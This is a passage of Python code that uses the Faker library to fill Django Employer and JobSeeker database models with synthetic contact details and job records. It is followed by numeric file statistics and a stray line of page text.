job_descriptions = [fake.unique.sentence() for i in range(count)]
statuses = [fake.boolean() for i in range(count)]
dates_needed = [fake.date() for i in range(count)]
for i in range(count):
Employer.objects.create(
firstname = first_names[i],
lastname = last_names[i],
phone_number = phone_numbers[i],
physical_address = addresses[i],
email_address = emails[i],
job_title = job_titles[i],
job_description = job_descriptions[i],
status = statuses[i],
date_needed = dates_needed[i]
)
class JobSeekerFaker:
def __init__(self, count):
fake = Faker()
first_names = [fake.unique.first_name() for i in range(count)]
last_names = [fake.unique.last_name() for i in range(count)]
phone_numbers = [fake.unique.phone_number() for i in range(count)]
addresses = [fake.unique.address() for i in range(count)]
emails = [fake.unique.email() for i in range(count)]
job_titles = [fake.unique.sentence() for i in range(count)]
job_descriptions = [fake.unique.sentence() for i in range(count)]
statuses = [fake.boolean() for i in range(count)]
dates_applied = [fake.date() for i in range(count)]
for i in range(count):
JobSeeker.objects.create(
firstname = first_names[i],
lastname = last_names[i],
phone_number = phone_numbers[i],
physical_address = addresses[i],
email_address = emails[i],
job_title = job_titles[i],
status = statuses[i],
date_applied = dates_applied[i]
)
| 42.981818
| 74
| 0.585448
| 292
| 2,364
| 4.575342
| 0.167808
| 0.05988
| 0.08982
| 0.164671
| 0.852545
| 0.823353
| 0.823353
| 0.823353
| 0.823353
| 0.823353
| 0
| 0
| 0.306261
| 2,364
| 55
| 75
| 42.981818
| 0.814634
| 0
| 0
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.06
| 0
| 0.14
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.